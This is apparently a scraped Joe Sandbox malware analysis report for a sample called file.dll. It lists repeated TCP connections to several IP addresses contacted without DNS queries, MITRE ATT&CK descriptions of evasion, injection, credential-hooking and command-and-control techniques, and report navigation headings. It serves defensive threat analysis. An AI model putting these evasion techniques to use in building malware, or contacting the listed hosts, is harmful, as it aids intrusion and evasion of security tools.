Source: Joe Sandbox View	ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View	ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox View	ASN Name: VDSINA-ASRU VDSINA-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.73.198

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\config

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Windows Analysis Report
file.dll